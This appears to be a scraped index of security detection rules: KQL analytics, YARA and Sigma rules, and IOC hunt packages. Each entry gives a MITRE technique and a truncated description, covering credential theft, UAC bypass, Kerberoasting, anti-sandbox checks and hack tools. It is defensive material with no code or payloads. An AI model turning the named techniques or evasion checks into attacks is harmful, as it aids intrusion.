'Identifies when 100 or more failed attempts by a given user in 10 minutes occur on the IIS Server. This could be indicative of attempted brute force based on known account information. This could als
Hijack network configuration
yara low
Hijack network configuration
Code injection with CreateRemoteThread in a remote process
Communications dyndns network
yara low
Communications dyndns network
Communications over P2P network
yara low
Communications over P2P network
Communications smtp
yara low
Communications smtp
Communications smtp
yara low
Communications smtp
Communications smtp
yara low
Communications smtp
Listen for incoming communication
yara low
Listen for incoming communication
Communications over TOR network
yara low
Communications over TOR network
Communications over Toredo network
yara low
Communications over Toredo network
Communications over UDP network
yara low
Communications over UDP network
Install itself for autorun at Windows startup
Silk Typhoon Suspicious Exchange Request
kql medium
T1190
W3CIISLog
'This query looks for suspicious request patterns to Exchange servers that fit a pattern observed by Silk Typhoon actors. The same query can be run on HTTPProxy logs from on-premise hosted Exchange se
Silk Typhoon Suspicious File Downloads.
kql medium
T1190
'This query looks for messages related to file downloads of suspicious file types. This query uses the Exchange HttpProxy AOBGeneratorLog, you will need to onboard this log as a custom log under the t
Suspicious link sharing pattern
kql low
T1598
'Alerts in links that have been shared across multiple Zoom chat channels by the same user in a short space if time. Adjust the threshold figure to change the number of channels a message needs to be
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 124 IOCs associated with ClearFake
ThreatFox: Unknown malware IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 12 IOCs associated with Unknown malware
ThreatFox: Unknown Loader IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 25 IOCs associated with Unknown Loader
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 9 IOCs associated with Unknown Stealer
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 10 IOCs associated with Nanocore RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 2 IOCs associated with Remcos
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with ValleyRAT
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Vidar is a credential-stealing malware that exfiltrates sensitive data via encrypted channels, often targeting financial institutions and using persistence mechanisms to maintain long-term access.
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 44 malicious URLs tagged as 32-bit
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 40 malicious URLs tagged as ClearFake
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 9 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as mirai
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 5 malicious URLs tagged as Mozi
T1078
'The alert shows users that join a Zoom meeting from a time zone other than the one the meeting was created in. You can also whitelist known good time zones in the tz_whitelist value using the tz data
Following Rule is referenced from AlienVault's Yara rule repository.This rule contains additional processes and driver names.
Affect hook table
yara low
Affect hook table
Zoom E2E Encryption Disabled
kql medium
T1040
'This alerts when end to end encryption is disabled for Zoom meetings.'
T1098T1078
SecurityEventWindowsEvent
'Identifies accounts that are added to a privileged group and then quickly removed, which could be a sign of compromise.'
T1098
SecurityEventWindowsEvent
'Identifies whenever a user account has the setting "Password Never Expires" in the user account properties selected. This is indicated in Security event 4738 in the EventData item labeled UserAccount
Anomalous Single Factor Signin
kql low
T1078.004
SigninLogs
'Detects successful signins using single factor authentication where the device, location, and ASN are abnormal. Single factor authentications pose an opportunity to access compromised accounts, inve
T1190
W3CIISLog
'Identifies connection attempts (success or fail) from clients with very short or very long User Agent strings and with less than 100 connection attempts.'
Checks if being debugged
yara low
Checks if being debugged
Checks for the presence of known debug tools
Anti-Sandbox checks for Anubis
yara low
Anti-Sandbox checks for Anubis
Anti-Sandbox checks for CWSandbox
yara low
Anti-Sandbox checks for CWSandbox
Anti-Sandbox checks for Joe Sandbox
yara low
Anti-Sandbox checks for Joe Sandbox
Anti-Sandbox checks for Sandboxie
yara low
Anti-Sandbox checks for Sandboxie
Anti-Sandbox checks for ThreatExpert
yara low
Anti-Sandbox checks for ThreatExpert
AntiVM checks for Bios version
yara low
AntiVM checks for Bios version
AntiVM checks for VirtualBox
yara low
AntiVM checks for VirtualBox
AntiVM checks for VMWare
yara low
AntiVM checks for VMWare
Authentication Attempt from New Country
kql medium
T1078.004
AADNonInteractiveUserSignInLogsSigninLogs
Detects when there is a login attempt from a country that has not seen a successful login in the previous 14 days. Threat actors may attempt to authenticate with credentials from compromised accounts
T1078.004
IdentityInfoSigninLogs
'Detects when a privileged user account successfully authenticates from a location, device or ASN that another admin has not logged in from in the last 7 days. Privileged accounts are a key target f
Check FindWindowA iat
yara low
YARA rule: Check_FindWindowA_iat
Check OutputDebugStringA iat
yara low
YARA rule: Check_OutputDebugStringA_iat
check RaiseException iat
yara low
YARA rule: check_RaiseException_iat
Check unhandledExceptionFiler iat
yara low
YARA rule: Check_unhandledExceptionFiler_iat
Anti-debug process memory working set size check
Disable AntiVirus
yara low
Disable AntiVirus
Disable Firewall
yara low
Disable Firewall
Disable Registry editor
yara low
Disable Registry editor
Disable User Access Control
yara low
Disable User Access Control
T1110
SecurityEventWindowsEvent
'Identifies when failed logon attempts are 20 or higher during a 10 minute period (2 failed logons per minute minimum) from valid account.'
T1110
W3CIISLog
'Identifies when 20 or more failed attempts from a given client IP in 1 minute occur on the IIS server. This could be indicative of an attempted brute force. This could also simply indicate a misconfi
New country signIn with correct password
kql medium
T1078T1110
SigninLogs
'Identifies an interrupted sign-in session from a country the user has not sign-in before in the last 7 days, where the password was correct. Although the session is interrupted by other controls such
T1098T1078
SecurityEventWindowsEvent
'Identifies when a user account was created and then added to the builtin Administrators group in the same day. This should be monitored closely and all additions reviewed.'
Privileged User Logon from new ASN
kql medium
T1078.004
IdentityInfoSigninLogs
'Detects a successful logon by a privileged account from an ASN not logged in from in the last 14 days. Monitor these logons to ensure they are legitimate and identify if there are any similar sign
T1078.004
'Detects when there is a Service Principal login attempt from a country that has not seen a successful login in the previous 14 days. Threat actors may attempt to authenticate with credentials from
T1134
SecurityEvent
'This query identifies whether an Active Directory user object was assigned a service principal name which could indicate that an adversary is preparing for performing Kerberoasting. This query check
Silk Typhoon New UM Service Child Process
kql medium
T1190
SecurityEventWindowsEvent
'This query looks for new processes being spawned by the Exchange UM service where that process has not previously been observed before. Reference: https://www.microsoft.com/security/blog/2021/03/02/
T1190
'This query looks for errors that may indicate that an attacker is attempting to exploit a vulnerability in the service. Reference: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targetin
Solorigate Named Pipe
kql high
T1055
SecurityEventWindowsEvent
'Identifies a match across various data feeds for named pipe IOCs related to the Solorigate incident. For the sysmon events required for this detection, logging for Named Pipe Events needs to be conf
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 163 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 4 IOCs associated with KongTuke
ThreatFox: Unknown malware IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 2 IOCs associated with Unknown malware
ThreatFox: StrelaStealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with StrelaStealer
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 28 IOCs associated with Vidar
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 36 malicious URLs tagged as 32-bit
URLhaus: 45-156-87-194 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 11 malicious URLs tagged as 45-156-87-194
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 37 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The Mirai malware family is a botnet that compromises IoT devices to launch large-scale DDoS
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 8 malicious URLs tagged as Mozi
T1098T1078
SecurityEventWindowsEvent
'Identifies when a user account has been added to a privileged built in domain local group or global group such as the Enterprise Admins, Cert Publishers or DnsAdmins. Be sure to verify this is an exp
T1098T1078
SecurityEventWindowsEvent
'Identifies when a user account is created and then deleted within 10 minutes. This can be an indication of compromise and an adversary attempting to hide in the noise.'
T1098T1078
SecurityEventWindowsEvent
'Identifies when a user account is enabled and then disabled within 10 minutes. This can be an indication of compromise and an adversary attempting to hide in the noise.'
T1190T1203
'This query uses the Azure Defender Security Nested Recommendations data to find machines vulnerable to OMIGOD CVE-2021-38647. OMI is the Linux equivalent of Windows WMI and helps users manage configu
T1552
SecurityEvent
'This detection uses Security events from the "AD FS Auditing" provider to detect suspicious object identifiers (OIDs) as part EventID 501 and specifically part of the Enhanced Key Usage attributes. T
AdminSDHolder Modifications
kql high
T1078
SecurityEvent
'This query detects modification in the AdminSDHolder in the Active Directory which could indicate an attempt for persistence. AdminSDHolder Modification is a persistence technique in which an attac
Check Debugger
yara low
YARA rule: Check_Debugger
Check Dlls
yara low
YARA rule: Check_Dlls
Check DriveSize
yara low
YARA rule: Check_DriveSize
Check FilePaths
yara low
The 'Check_FilePaths
Check Qemu Description
yara low
YARA rule: Check_Qemu_Description
Check Qemu DeviceMap
yara low
YARA rule: Check_Qemu_DeviceMap
Check UserNames
yara low
YARA rule: Check_UserNames
Check VBox Description
yara low
YARA rule: Check_VBox_Description
Check VBox DeviceMap
yara low
The 'Check_VBox_DeviceMap' rule detects potential malicious activity involving VirtualBox device mapping, such as unauthorized device redirection or suspicious
Check VBox Guest Additions
yara low
YARA rule: Check_VBox_Guest_Additions
Check VBox VideoDrivers
yara low
YARA rule: Check_VBox_VideoDrivers
Check VmTools
yara low
The 'Check_VmTools' YARA rule detects artifacts associated with virtual machine tools, which may indicate evasion techniques or malicious activity in virtualized environments
Check VMWare DeviceMap
yara low
YARA rule: Check_VMWare_DeviceMap
Check Wine
yara low
YARA rule: Check_Wine
COM Event System Loading New DLL
kql medium
T1543
'This query uses Sysmon Image Load (Event ID 7) and Process Create (Event ID 1) data to look for COM Event System being used to load a newly seen DLL.'
DebuggerPattern CPUID
yara low
YARA rule: DebuggerPattern__CPUID
DebuggerPattern SEH Inits
yara low
YARA rule: DebuggerPattern__SEH_Inits
DebuggerPattern SEH Saves
yara low
YARA rule: DebuggerPattern__SEH_Saves
DSRM Account Abuse
kql high
T1098
'This query detects an abuse of the DSRM account in order to maintain persistence and access to the organization's Active Directory. Ref: https://adsecurity.org/?p=1785'
Fake computer account created
kql medium
T1564
SecurityEvent
'This query detects domain user accounts creation (event ID 4720) where the username ends with $. Accounts that end with $ are normally domain computer accounts and when they are created the event ID
T1098T1078
SecurityEventWindowsEvent
'Identifies when a recently created Group was added to a privileged built in domain local group or global group such as the Enterprise Admins, Cert Publishers or DnsAdmins. Be sure to verify this is
T1052
CloudAppEventsDeviceEventsDeviceFileEventsSecurityAlert
'This query looks for any mass download by a single user with possible file copy activity to a new USB drive. Malicious insiders may perform such activities that may cause harm to the organization. T
T1005
SecurityEventWindowsEvent
'This detection uses Windows security events to detect suspicious access attempts to the registry key of Microsoft Entra ID Health monitoring agent. This detection requires an access control entry (AC
T1005
SecurityEventWindowsEvent
'This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Microsoft Entra ID Health service agents (e.g AD FS). Information from AD H
T1059
SecurityEventWindowsEvent
'This query identifies when a process execution command-line indicates that a registry value is written to allow for later execution a malicious script References: https://www.microsoft.com/security/
T1547
SecurityEventWindowsEvent
'This query idenifies when rundll32.exe executes a specific set of inline VBScript commands References: https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-
Modification of Accessibility Features
kql medium
T1546.008
'Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a
T1021
SecurityEventWindowsEvent
'Identifies when an RDP connection is made to multiple systems and above the normal connection count for the previous 7 days. Connections from the same system with the same account within the same day
T1134
SecurityEvent
'This query identifies Active Directory computer objects modifications that allow an adversary to abuse the Resource-based constrained delegation. This query checks for event id 5136 that the Object
Potential Build Process Compromise
kql medium
T1554
SecurityEventWindowsEvent
'The query looks for source code files being modified immediately after a build process is started. The purpose of this is to look for malicious code injection during the build process. More details:
Potential Kerberoasting
kql medium
T1558
SecurityEventWindowsEvent
'A service principal name (SPN) is used to uniquely identify a service instance in a Windows environment. Each SPN is usually associated with a service account. Organizations may have used service acc
Rare RDP Connections
kql medium
T1021
SecurityEventWindowsEvent
'Identifies when an RDP connection is new or rare related to any logon type by a given account today compared with the previous 14 days. RDP connections are indicated by the EventID 4624 with LogonTyp
RDP Nesting
kql medium
T1021
SecurityEventWindowsEvent
'Query detects potential lateral movement within a network by identifying when an RDP connection (EventID 4624, LogonType 10) is made to an initial system, followed by a subsequent RDP connection from
SEH Init
yara low
YARA rule: SEH_Init
SEH Save
yara low
YARA rule: SEH_Save
Solorigate Defender Detections
kql high
T1195
SecurityAlert
'Surfaces any Defender Alert for Solorigate Events. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query joins the DeviceInfo table to clearl
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Mirai
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 63 IOCs associated with ClearFake
ThreatFox: AMOS IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 7 IOCs associated with AMOS
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 7 IOCs associated with Unknown malware
ThreatFox: Unknown Loader IOCs
ioc-hunt high
UrlClickEvents
The "Unknown Loader" malware is a downloader that
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
DnsEventsUrlClickEvents
The "Unknown Stealer" malware is a data-exfiltration
ThreatFox: AsyncRAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with AsyncRAT
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with Nanocore RAT
ThreatFox: NetSupportManager RAT IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 15 IOCs associated with NetSupportManager RAT
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 87 IOCs associated with Vidar
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 26 malicious URLs tagged as 32-bit
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 26 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 30 malicious URLs tagged as elf
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as Mozi
URLhaus: sh Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as sh
URLhaus: ua-wget Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as ua-wget
Possibly employs anti-virtualization techniques
T1078T1489
AzureActivityIdentityInfoSecurityAlert
'This query will alert on any sign-ins from devices infected with malware in correlation with workspace deletion activity. Attackers may attempt to delete workspaces containing compute instances afte
T1112T1059.005
imRegistry
Detects suspicious registry modifications made by suspicious processes such as script engine processes such as WScript, or CScript etc. These processes are rarely used for legitimate registry modifica
HackTool - NetExec File Indicators
sigma high
T1021.002T1059.005
imFileEvent
Detects file creation events indicating NetExec (nxc.exe) execution on the local machine. NetExec is a PyInstaller-bundled binary that extracts its embedded data files to a "_MEI<random>" directory un
T1547.005
imRegistry
Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
HackTool - NetExec Execution
sigma high
T1018T1021
imProcessCreate
Detects execution of the hacktool NetExec. NetExec (formerly CrackMapExec) is a widely used post-exploitation tool designed for Active Directory penetration testing and network enumeration In enterpri
T1189
'This rule identifies a web request to a URL that holds a file type, including .ps1, .bat, .vbs, and .scr that can be harmful if downloaded. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) an
T1496
'This rule identifies a web request with a user agent header known to belong to a crypto miner. This indicates a crypto miner may have infected the client machine.<br>You can add custom crypto mining
T1059T1046T1021T1557T1102T1020
'This rule identifies a web request with a user agent header known to belong to a hacking tool. This indicates a hacking tool is used on the host.<br>You can add custom hacking tool indicating User-Ag
A host is potentially running PowerShell to send HTTP(S) requests (ASIM Web Session schema)
kql medium
T1132T1140T1059.001
'This rule identifies a web request with a user agent header known to belong PowerShell. <br>You can add custom Powershell indicating User-Agent headers using a watchlist, for more information refer t
Account created from non-approved sources
kql medium
T1136.003
AuditLogsSigninLogs
'This query looks for an account being created from a domain that is not regularly seen in a tenant. Attackers may attempt to add accounts from these sources as a means of establishing persistant ac
T1078.004
AuditLogsIdentityInfo
'Detects when a Temporary Access Pass (TAP) is created for a Privileged Account. A Temporary Access Pass is a time-limited passcode issued by an admin that satisfies strong authentication requiremen
ADFS DKM Master Key Export
kql medium
T1005
DeviceEventsSecurityEventWindowsEvent
'Identifies an export of the ADFS DKM Master Key from Active Directory. References: https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/, https://cloud.go
Anomalous login followed by Teams action
kql medium
T1199T1136T1078T1098
AADNonInteractiveUserSignInLogsOfficeActivitySigninLogs
'Detects anomalous IP address usage by user accounts and then checks to see if a suspicious Teams action is performed. Query calculates IP usage Delta for each user account and selects accounts where
Anomaly Sign In Event from an IP
kql medium
T1078
SigninLogs
'Identifies sign-in anomalies from an IP in the last hour, targeting multiple users where the password is correct after multiple attempts'
T1211T1059T1190T0890
AzureDiagnostics
'Identifies a match for SQL Injection attack in the Application gateway WAF logs. The Threshold value in the query can be changed as per your infrastructure's requirement. References: https://owasp.o
T1189T1203T0853
AzureDiagnostics
'Identifies a match for XSS attack in the Application gateway WAF logs. The Threshold value in the query can be changed as per your infrastructure's requirement. References: https://owasp.org/www-pro
Application ID URI Changed
kql medium
T1078.004
AuditLogs
'Detects changes to an Application ID URI. Monitor these changes to make sure that they were authorized. Ref: https://docs.microsoft.com/azure/active-directory/fundamentals/security-operations-app
Application Redirect URL Update
kql medium
T1078.004
AuditLogs
'Detects the redirect URL of an app being changed. Applications associated with URLs not controlled by the organization can pose a security risk. Ref: https://docs.microsoft.com/azure/active-direc
AppServices AV Scan Failure
kql low
AuditLogs
'Identifies if an AV scan fails in Azure App Services.'
AuditLogs
'Identifies if an AV scan finds infected files in Azure App Services.'
T1204
DeviceProcessEventsSecurityEvent
This detects attempts to manipulate audit policies using auditpol command. This technique was seen in relation to Solorigate attack but the results can indicate potential malicious activity used in di
T1486
SecurityAlert
'This query looks for Microsoft Defender AV detections related to Dev-0530 actors. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query join
T1486
SecurityAlert
'This query looks for Microsoft Defender AV detections related to Europium actor. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query join
T1486
SecurityAlert
'This query looks for Microsoft Defender AV detections related to Hive Ransomware. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query joins
T1562.008
AzureActivity
'This query looks for diagnostic settings that are removed from a resource. This could indicate an attacker or malicious internal trying to evade detection before malicious act is performed. If the di
T1570T1212
AzureActivityBehaviorAnalytics
'Identifies when the Azure Run Command operation is executed by a UserPrincipalName and IP Address that has resulted in a recent user entity behaviour alert.'
T1570T1059.001
AzureActivityDeviceEventsDeviceFileEvents
'Identifies when Azure Run command is used to execute a PowerShell script on a VM that is unique. The uniqueness of the PowerShell script is determined by taking a combined hash of the cmdLets it impo
T1078.004
AuditLogs
'Detects changes to an applications sign out URL. Look for any modifications to a sign out URL. Blank entries or entries to non-existent locations would stop a user from terminating a session. Ref
Changes to Application Ownership
kql medium
T1078.004
AuditLogs
'Detects changes to the ownership of an appplicaiton. Monitor these changes to make sure that they were authorized. Ref: https://learn.microsoft.com/en-gb/entra/architecture/security-operations-ap
Changes to PIM Settings
kql high
T1078.004
AuditLogs
'PIM provides a key mechanism for assigning privileges to accounts, this query detects changes to PIM role settings. Monitor these changes to ensure they are being made legitimately and don't confer
T1078
AADNonInteractiveUserSignInLogsCommonSecurityLogSigninLogs
'Correlate IPs blocked by a Cisco firewall appliance with successful Microsoft Entra ID signins. Because the IP was blocked by the firewall, that same IP logging on successfully to Entra ID is potenti
'IP addresses of broadband links that usually indicates users attempting to access their home network, for example for a remote session to a home computer.'
'Detects first connection to an unpopular website (possible malicious payload delivery).'
'Detects suspicious user agent strings used by crypto miners in proxy logs.'
Cisco Umbrella - Empty User Agent Detected
kql medium
'Rule helps to detect empty and unusual user agent indicating web browsing activity by an unusual process other than a web browser.'
'Detects suspicious user agent strings used by known hack tools'
Cisco Umbrella - Rare User Agent Detected
kql medium
'Rule helps to detect a rare user-agents indicating web browsing activity by an unusual process other than a web browser.'
'It is reccomended that these Categories shoud be blocked by policies because they provide harmful/malicious content..'
'Detects request to potentially harmful file types (.ps1, .bat, .vbs, etc.).'
Cisco Umbrella - URI contains IP address
kql medium
'Malware can use IP address to communicate with C2.'
'Rule helps to detect Powershell user-agent activity by an unusual process other than a web browser.'
T1574
DeviceRegistryEventsSecurityEvent
'This query looks for changes to COM registry keys to point to files in C:\Windows\System32\spool\drivers\color\. This can be used to enable COM hijacking for persistence. Ref: https://www.microso
T1078.004
AuditLogs
'Detects a Conditional Access Policy being modified by a user who has not modified a policy in the last 14 days. A threat actor may try to modify policies to weaken the security controls in place.
CreepyDrive request URL sequence
kql high
T1567.002T1102.002
CommonSecurityLog
'CreepyDrive uses OneDrive for command and control, however, it makes regular requests to predicatable paths. This detecton will alert when over 20 sequences are observed in a single day.'
CreepyDrive URLs
kql high
T1567.002T1102.002
CommonSecurityLog
'CreepyDrive uses OneDrive for command and control. This detection identifies URLs specific to CreepyDrive.'
Detect PIM Alert Disabling activity
kql medium
T1098T1078
AuditLogs
'Privileged Identity Management (PIM) generates alerts when there is suspicious or unsafe activity in Microsoft Entra ID (Azure AD) organization. This query will help detect attackers attempts to dis
Detecting Impossible travel with mailbox permission tampering & Privilege Escalation attempt
kql medium
T1078T1548
AuditLogsOfficeActivitySecurityAlert
'This hunting query will alert on any Impossible travel activity in correlation with mailbox permission tampering followed by account being added to a PIM managed privileged group. Ensure this impossi
T1569T1003
DeviceProcessEventsSecurityAlert
'This hunting query looks for file paths/hashes related to observed activity by Dev-0228. The actor is known to use custom version of popular tool like PsExec, Procdump etc. to carry its activity. Th
Dev-0530 File Extension Rename
kql high
T1486
DeviceFileEventsimFileEvent
'Dev-0530 actors are known to encrypt the contents of the victims device as well as renaming the file extensions. This query looks for the creation of files with .h0lyenc extension or presence of rans
Email access via active sync
kql medium
T1068T1078
DeviceProcessEventsSecurityEventWindowsEvent
This query detects attempts to add attacker devices as allowed IDs for active sync using the Set-CASMailbox command. This technique was seen in relation to Solorigate attack but the results can indica
T1078.004
AuditLogs
'Detects a user's consent to an OAuth application being blocked due to it being too risky. These events should be investigated to understand why the user attempted to consent to the applicaiton and
T1071T1003
CommonSecurityLogDeviceFileEventsDeviceImageLoadEventsDeviceNetworkEventsDnsEventsOfficeActivityVMConnectionimFileEvent
'Identifies a match across various data feeds for hashes and IP IOC related to Europium Reference: https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-t
Exchange Worker Process Making Remote Call
kql medium
T1059.001T1059.003
DeviceProcessEventsW3CIISLog
'This query dynamically identifies Exchange servers and then looks for instances where the IIS worker process initiates a call out to a remote URL using either cmd.exe or powershell.exe. This behaviou
T1078T1110
SigninLogs
'Identifies a list of IP addresses with a minimum number (default of 5) of failed logon attempts to AWS Console. Uses that list to identify any successful Microsoft Entra ID logons from these IPs with
T1078T1110
AADNonInteractiveUserSignInLogsSigninLogs
'Identifies a list of IP addresses with a minimum number (defualt of 5) of failed logon attempts to Microsoft Entra ID. Uses that list to identify any successful AWS Console logons from these IPs with
T1078T1110
AADNonInteractiveUserSignInLogsSecurityEventSigninLogsSyslogWindowsEvent
'Identifies a list of IP addresses with a minimum number (default of 5) of failed logon attempts to Microsoft Entra ID. Uses that list to identify any successful remote logons to hosts from these IPs
T1078T1110
AADNonInteractiveUserSignInLogsSecurityEventSigninLogsSyslogWindowsEvent
'Identifies a list of IP addresses with a minimum number(default of 5) of failed logon attempts to remote hosts. Uses that list to identify any successful logons to Microsoft Entra ID from these IPs w
T1071T1571
CommonSecurityLog
'Identifies patterns in the time deltas of contacts between internal and external IPs in Fortinet network data that are consistent with beaconing. Accounts for randomness (jitter) and seasonality suc
T1210
SecurityEventWindowsEvent
'This query detects instances where an attacker has gained the ability to execute code on an ADFS Server through remote WMI Execution. In order to use this query you need to be collecting Sysmon Event
T1078.004
AuditLogs
'Detects when a Guest User is added by a user account that has not been seen adding a guest in the previous 14 days. Monitoring guest accounts and the access they are provided is important to detect
T1078T1098T1114
OfficeActivitySigninLogs
'It is possible that a disabled user account is compromised and another account on the same IP is used to perform operations that are not typical for that user. The query filters the SigninLogs for e
T1570
DeviceProcessEventsSecurityEventimProcessCreate
'The query below identifies powershell commands used by the threat actor Mango Sandstorm. Reference: https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-u
T1041T1071.001
CommonSecurityLogDeviceNetworkEvents
'This detection will identify network requests in HTTP proxy data that contains Base64 encoded IP addresses. After identifying candidates the query joins with DeviceNetworkEvents to idnetify any machi
T1078T1110
AADNonInteractiveUserSignInLogsCommonSecurityLogSigninLogs
This query creates a list of IP addresses with the number of failed login attempts to Entra ID above a set threshold ( default of 5 ). It then looks for any successful Palo Alto VPN logins from any
T1071
AzureDiagnosticsCommonSecurityLogVMConnection
'Matches domain name IOCs related to Forest Blizzard group activity published July 2019 with CommonSecurityLog, DnsEvents and VMConnection dataTypes. References: https://blogs.microsoft.com/on-the-iss
T1078
CommonSecurityLogSecurityAlertSigninLogs
'This content is employed to correlate with Microsoft Defender XDR phishing-related alerts. It focuses on instances where a user successfully connects to a phishing URL from a non-Microsoft network de
Malformed user agent
kql medium
T1189T1071T1203
AADNonInteractiveUserSignInLogsAzureDiagnosticsOfficeActivitySigninLogsW3CIISLog
'Malware authors will sometimes hardcode user agent string values when writing the network communication component of their malware. Malformed user agents can be an indication of such malware.'
T1071
AzureDiagnosticsCommonSecurityLogDeviceFileEventsDeviceImageLoadEventsDeviceNetworkEventsDnsEventsOfficeActivityVMConnectionimFileEvent
'Identifies a match across various data feeds for domains, hashes and IP IOC related to Mercury Reference: https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabiliti
Microsoft Defender for Endpoint (MDE) signatures for Azure Synapse pipelines and Azure Data Factory
kql high
T1190
SecurityAlert
'This query looks for Microsoft Defender for Endpoint detections related to the remote command execution attempts on Azure IR with Managed VNet or SHIR. In Microsoft Sentinel, the SecurityAlerts tabl
Missing Domain Controller Heartbeat
kql high
T1499T1564
Heartbeat
'This detection will go over the heartbeats received from the agents of Domain Controllers over the last hour, and will create alerts if the last heartbeats were received an hour ago.'
Multiple Password Reset by user
kql low
T1078T1110
AuditLogsOfficeActivitySecurityEventSyslogWindowsEvent
'This query will determine multiple password resets by user across multiple data sources. Account manipulation including password reset may aid adversaries in maintaining access to credentials and cer
NRT Malicious Inbox Rule
kql medium
T1098T1078
OfficeActivity
'Often times after the initial compromise the attackers create inbox rules to delete emails that contain certain keywords. This is done so as to limit ability to warn compromised users that they've b
T1114T1020
OfficeActivity
'Identifies when multiple (more than one) users mailboxes are configured to forward to the same destination. This could be an attacker-controlled destination mailbox configured to collect mail from mu
OMI Vulnerability Exploitation
kql medium
T1190
Heartbeat
Following the September 14th, 2021 release of three Elevation of Privilege (EoP) vulnerabilities (CVE-2021-38645, CVE-2021-38649, CVE-2021-38648) and one unauthenticated Remote Code Execution (RCE) vu
PE file dropped in Color Profile Folder
kql medium
T1203
DeviceFileEvents
'This query looks for writes of PE files to C:\Windows\System32\spool\drivers\color\. This is a common directory used by malware, as well as some legitimate programs, and writes of PE files to the f
T1566
CommonSecurityLogSecurityAlert
'The purpose of this content is to identify successful phishing links accessed by users. Once a user clicks on a phishing link, we observe successful network activity originating from non-Microsoft ne
T1568
CommonSecurityLog
'Identifies contacts with domains names in CommonSecurityLog that might have been generated by a Domain Generation Algorithm (DGA). DGAs can be used by malware to generate rendezvous points that are d
T1568
'This rule identifies communication with hosts that have a domain name that might have been generated by a Domain Generation Algorithm (DGA). DGAs are used by malware to generate rendezvous points tha
T1548.002
imRegistry
'This detection looks for the steps required to conduct a UAC bypass using Fodhelper.exe. By default this detection looks for the setting of the required registry keys and the invoking of the process
Prestige ransomware IOCs Oct 2022
kql high
T1203
CommonSecurityLogDeviceEventsDeviceFileEventsDeviceImageLoadEventsSecurityAlertimFileEvent
